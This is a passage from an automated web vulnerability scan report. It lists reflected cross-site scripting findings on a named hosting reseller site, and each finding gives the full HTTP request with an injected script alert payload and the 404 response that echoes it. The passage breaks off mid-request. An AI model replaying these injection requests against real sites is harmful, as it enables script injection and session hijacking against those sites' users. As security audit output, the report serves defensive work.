GET /web-service/web-hosting/themes/kosmos38db3<script>alert(1)</script>90729673ba5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos38db3<script>alert(1)</script>90729673ba5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5568. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2793<script>alert(1)</script>f89b4be5dc3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesc2793<script>alert(1)</script>f89b4be5dc3/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesc2793<script>alert(1)</script>f89b4be5dc3/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5569. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9d70<script>alert(1)</script>e22ceabe0c8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/ratinge9d70<script>alert(1)</script>e22ceabe0c8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/ratinge9d70<script>alert(1)</script>e22ceabe0c8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5570. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c11ba<script>alert(1)</script>36b7b56863d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.phpc11ba<script>alert(1)</script>36b7b56863d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.phpc11ba<script>alert(1)</script>36b7b56863d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5571. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bf244<a>bde21e7ea60 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbf244<a>bde21e7ea60&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbf244<a>bde21e7ea60&opt=2 was not found on this server.</p>
...[SNIP]...

2.5572. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c81e8<a>3635aadcec4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...c81e8<a>3635aadcec4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...c81e8<a>3635aadcec4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5573. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31f67<script>alert(1)</script>b2ac89c0891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&31f67<script>alert(1)</script>b2ac89c0891=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&31f67<script>alert(1)</script>b2ac89c0891=1 was not found on this server.</p>
...[SNIP]...

2.5574. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b1de3<a>7a2bfc8ba8c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b1de3<a>7a2bfc8ba8c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b1de3<a>7a2bfc8ba8c was not found on this server.</p>
...[SNIP]...

2.5575. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3deed<script>alert(1)</script>2af6d1ed791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3deed<script>alert(1)</script>2af6d1ed791/web-hosting/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3deed<script>alert(1)</script>2af6d1ed791/web-hosting/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5576. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa8a0<script>alert(1)</script>72453c720f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingfa8a0<script>alert(1)</script>72453c720f2/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingfa8a0<script>alert(1)</script>72453c720f2/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5577. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5bed<script>alert(1)</script>11cd06a2295 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesd5bed<script>alert(1)</script>11cd06a2295/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesd5bed<script>alert(1)</script>11cd06a2295/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5578. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b505<script>alert(1)</script>105957bb74f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos5b505<script>alert(1)</script>105957bb74f/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos5b505<script>alert(1)</script>105957bb74f/images/review/ was not found on this server.</p>
...[SNIP]...

2.5579. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 46644<script>alert(1)</script>892e74c2297 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images46644<script>alert(1)</script>892e74c2297/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images46644<script>alert(1)</script>892e74c2297/review/ was not found on this server.</p>
...[SNIP]...

2.5580. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2aa36<script>alert(1)</script>c6fe3bf9322 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review2aa36<script>alert(1)</script>c6fe3bf9322/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review2aa36<script>alert(1)</script>c6fe3bf9322/ was not found on this server.</p>
...[SNIP]...

2.5581. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 886de<script>alert(1)</script>97d189875ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/?886de<script>alert(1)</script>97d189875ae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/?886de<script>alert(1)</script>97d189875ae=1 was not found on this server.</p>
...[SNIP]...

2.5582. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload beb15<script>alert(1)</script>7c599ec0822 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebeb15<script>alert(1)</script>7c599ec0822/web-hosting/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebeb15<script>alert(1)</script>7c599ec0822/web-hosting/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5583. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d15e9<script>alert(1)</script>91e986188c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingd15e9<script>alert(1)</script>91e986188c8/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingd15e9<script>alert(1)</script>91e986188c8/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5584. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6227e<script>alert(1)</script>ae48ed2d683 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes6227e<script>alert(1)</script>ae48ed2d683/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes6227e<script>alert(1)</script>ae48ed2d683/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5585. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 417d0<script>alert(1)</script>1ac3b571b70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos417d0<script>alert(1)</script>1ac3b571b70/images/review/0.gif HTTP/1.1
